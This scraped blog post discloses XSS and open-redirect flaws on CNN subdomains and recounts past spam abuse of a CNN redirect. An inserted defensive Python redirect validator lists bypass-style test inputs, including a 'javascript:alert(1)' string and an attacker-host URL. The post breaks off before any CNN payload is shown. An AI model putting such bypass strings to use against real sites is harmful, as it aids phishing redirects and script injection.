<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/web-security/about-group-xss-xrf-open-redirect/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/web-security/about-group-xss-xrf-open-redirect/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-56833706987804301952015-06-05T23:44:00.000-07:002015-06-05T23:44:49.560-07:00CNN Travel.cnn.com XSS and Ads.cnn.com Open Redirect Web Security Vulnerabilities<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlTXvX6oM9FLhvzhOoQMs8sx9No0v6R-2v_0KZ4hzESdkzr_QTIqjIBIfy5X1sr4bBAvVQ7YNqwCUQrDi6f47H-71bs-oxT2rMFDXUZ18xueKA8WNFKsddY1kCfDGzbkEHuriGyq2w7N8/s1600/cnn_travel_xss.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlTXvX6oM9FLhvzhOoQMs8sx9No0v6R-2v_0KZ4hzESdkzr_QTIqjIBIfy5X1sr4bBAvVQ7YNqwCUQrDi6f47H-71bs-oxT2rMFDXUZ18xueKA8WNFKsddY1kCfDGzbkEHuriGyq2w7N8/s400/cnn_travel_xss.png" style="cursor: move;" width="400" /></span></a></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">CNN Travel.cnn.com XSS and Ads.cnn.com Open Redirect Web Security Vulnerabilities</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">http://cnn.com</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"The Cable News Network (CNN) is an American basic cable and satellite television channel that is owned by the Turner Broadcasting System division of Time Warner. The 24-hour cable news channel was founded in 1980 by American media proprietor Ted Turner. Upon its launch, CNN was the first television channel to provide 24-hour news coverage, and was the first all-news television channel in the United States. While the news channel has numerous affiliates, CNN primarily broadcasts from the Time Warner Center in New York City, and studios in Washington, D.C. and Los Angeles; its headquarters at the CNN Center in Atlanta is only used for weekend programming. CNN is sometimes referred to as CNN/U.S. to distinguish the American channel from its international sister network, CNN International. As of August 2010, CNN is available in over 100 million U.S. households. Broadcast coverage of the U.S. channel extends to over 890,000 American hotel rooms, as well as carriage on cable and satellite providers throughout Canada. Globally, CNN programming airs through CNN International, which can be seen by viewers in over 212 countries and territories. As of February 2015, CNN is available to approximately 96,289,000 cable, satellite and telco television households (82.7% of households with at least one television set) in the United States." (Wikipedia)</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Discovered and Reported by:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Jing Wang, </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="font-family: Arial, Helvetica, sans-serif; line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="font-family: Arial, Helvetica, sans-serif; text-align: justify;"><span style="line-height: 17.8181819915772px;">Singapore. (</span><a href="https://twitter.com/justqdjing/status/549420227021115392">@justqdjing</a><span style="line-height: 17.8181819915772px;">)</span></span></div>
</div>
<div style="margin: 0px;">
<a href="http://www.tetraph.com/wangjing/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CNN's website has security bugs that can be exploited by XSS (Cross Site Scripting) and Open Redirect (Unvalidated Redirects and Forwards) attacks.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">According to published news reports, CNN users have been attacked through both Open Redirect and XSS vulnerabilities.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">According to E Hacker News on June 06, 2013, (@BreakTheSec) came across a diet spam campaign that leveraged an open redirect vulnerability at CNN, one of the top news organizations.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">After that attack, CNN took measures to detect Open Redirect vulnerabilities, and they held up well during testing: almost no links on CNN's website are vulnerable to Open Redirect attack now, and it takes a long time to find a new, unpatched Open Redirect vulnerability on the site.</span></div>
</div>
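The open redirect abuse described above works because a redirect endpoint forwards to whatever URL it is handed. The following is an added example (not code from the original post or from CNN) of the server-side check that stops it: only same-site relative paths or hosts on an explicit allowlist are accepted, and anything else falls back to a fixed safe target. The host names, the `SITE_BASE` value and the function name are assumptions for illustration.

```python
from urllib.parse import urlsplit, urljoin

# Assumed allowlist of hosts a redirect may land on (placeholder names).
ALLOWED_HOSTS = {"www.example.com", "travel.example.com"}
SITE_BASE = "https://www.example.com/"
SAFE_DEFAULT = "/"


def safe_redirect_target(candidate: str) -> str:
    """Return a redirect target that stays on an allowed host, else SAFE_DEFAULT.

    Rejects absolute URLs to foreign hosts, protocol-relative URLs ("//host"),
    userinfo tricks ("https://good@evil"), non-http(s) schemes (javascript:,
    data:) and backslashes, which browsers normalise to forward slashes.
    """
    if not candidate:
        return SAFE_DEFAULT
    # Drop characters browsers ignore inside URLs, then treat "\" like "/".
    cleaned = candidate.strip().replace("\t", "").replace("\r", "").replace("\n", "")
    cleaned = cleaned.replace("\\", "/")
    try:
        parts = urlsplit(cleaned)
    except ValueError:  # e.g. malformed IPv6 literal
        return SAFE_DEFAULT
    if parts.scheme and parts.scheme.lower() not in ("http", "https"):
        return SAFE_DEFAULT
    if parts.netloc:
        # Absolute or protocol-relative URL: the *real* host must be allowlisted.
        if (parts.hostname or "").lower() not in ALLOWED_HOSTS:
            return SAFE_DEFAULT
        return cleaned
    # No host part: only a site-relative path starting with a single "/" is allowed.
    if not cleaned.startswith("/") or cleaned.startswith("//"):
        return SAFE_DEFAULT
    # Resolve against the site base and confirm where it actually lands.
    resolved = urlsplit(urljoin(SITE_BASE, cleaned))
    if (resolved.hostname or "").lower() not in ALLOWED_HOSTS:
        return SAFE_DEFAULT
    return cleaned


if __name__ == "__main__":
    # Constructed inputs in the shape of the spam links discussed above.
    for target in ["/news/2013/story", "http://diet.example.net/offer",
                   "//diet.example.net/offer", "javascript:alert(1)"]:
        print(repr(target), "->", safe_redirect_target(target))
```

The design point is that the check is done on the parsed host, not by string prefix matching: a prefix test such as `startswith("http://www.example.com")` is defeated by `http://www.example.com.attacker-controlled.example`, and a substring test is defeated by `http://attacker.example/?x=www.example.com`.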
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CNN.com was hit by the Open Redirect attack in 2013, while the XSS attacks happened in 2007.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><1></b> "The tweet apparently shows cyber criminals managed to leverage the open redirect security flaw in the CNN to redirect twitter users to the Diet spam websites."</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHiqxMStMQBPNNoZFwPryqWn1mSDL13rriGegYZCicobbwcN6KUEondvLrsN11L66hxnlo0LN3KIS65E2Qy79GBs82Lhpya6vN_46xIFYcMl3sO1sYJsVDORZxMgl7WEEv5PajehO1ndU/s1600/twitter-spam-leverages-cnn-open-redirection-vulnerability.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="291" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHiqxMStMQBPNNoZFwPryqWn1mSDL13rriGegYZCicobbwcN6KUEondvLrsN11L66hxnlo0LN3KIS65E2Qy79GBs82Lhpya6vN_46xIFYcMl3sO1sYJsVDORZxMgl7WEEv5PajehO1ndU/s400/twitter-spam-leverages-cnn-open-redirection-vulnerability.jpg" style="cursor: move;" width="400" /></span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Figure from ehackingnews.com</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">At the same time, the cybercriminals have also leveraged a similar vulnerability in a Yahoo domain to trick users into thinking that the links point to a trusted website.</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Yahoo Open Redirects Vulnerabilities:</span></div>
</div>
<div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html</a></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><2></b> CNN.com XSS hacked</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2007/Aug/216" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/<wbr></wbr>fulldisclosure/2007/Aug/216</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Several other similar 0-day vulnerabilities in CNN's products have been found by other bug hunters before, and CNN has patched some of them. BugTraq is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The following things can be posted to the Bugtraq list: (a) Information on computer or network related security vulnerabilities (UNIX, Windows NT, or any other). (b) Exploit programs, scripts or detailed processes about the above. (c) Patches, workarounds, fixes. (d) Announcements, advisories or warnings. (e) Ideas, future plans or current works dealing with computer/network security. (f) Information material regarding vendor contacts and procedures. (g) Individual experiences in dealing with above vendors or security organizations. (h) Incident advisories or informational reporting. (i) New or updated security tools. A large number of the following web security issues have been published there: Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage, Denial of Service, File Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML Injection, Spam. It also publishes suggestions, advisories and solution details related to XSS and URL Redirection vulnerabilities, and cyber intelligence recommendations.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) CNN (cnn.com) Travel-City Related Links XSS (cross site scripting) Web Security Bugs</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">travel.cnn.com/</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
</div>
